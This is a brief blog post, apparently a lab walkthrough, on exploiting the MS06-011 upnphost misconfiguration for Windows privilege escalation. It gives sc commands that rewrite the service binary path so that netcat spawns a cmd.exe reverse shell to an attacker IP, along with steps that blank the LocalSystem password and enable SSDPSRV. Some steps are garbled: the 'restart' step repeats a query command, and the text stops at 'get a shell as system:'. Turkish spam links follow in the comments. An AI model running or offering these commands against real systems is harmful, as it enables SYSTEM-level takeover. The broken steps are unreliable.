MS06-011 is a miss-configuration in Universal Plug and Play Device Host service, called upnphost. This vulnerability allows low privileged users to change the configuration of this privileged service, facilitating elevations of privileges in the affected system.
First step to exploit it is to check that we have access to the service by running:
sc qc upnphost
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.x.xx 1234 -e C:\WINDOWS\System32\cmd.exe"
We set a blank password for LocalSystem account:sc config upnphost obj= ".\LocalSystem" password= ""
And restart the service:sc qc upnphost
In this machine, the service does not start because it depends on SSDPSRV, which is disabled. We can easily enable it by running:
sc qc upnphost
sc config SSDPSRV start= auto
net start SSDPSRV
We put netcat to catch the reverse shell and start the vulnerable server and get a shell as system:
Is this vulnerability still available?
ReplyDeleteYeah :)
Deleteyurtdışı kargo
ReplyDeleteresimli magnet
instagram takipçi satın al
yurtdışı kargo
sms onay
dijital kartvizit
dijital kartvizit
https://nobetci-eczane.org/
4QPUN